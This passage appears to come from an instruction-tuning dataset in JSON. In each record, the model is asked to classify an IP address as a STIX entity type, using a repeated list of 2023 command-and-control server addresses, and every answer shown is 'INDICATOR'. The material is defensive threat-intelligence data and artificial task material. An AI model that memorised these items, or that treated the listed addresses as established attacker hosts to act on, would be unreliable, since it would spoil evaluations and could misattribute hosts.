84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n66.42.104.158\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n188.166.176.39\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.47.181\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n104.248.54.250\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.190.137\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 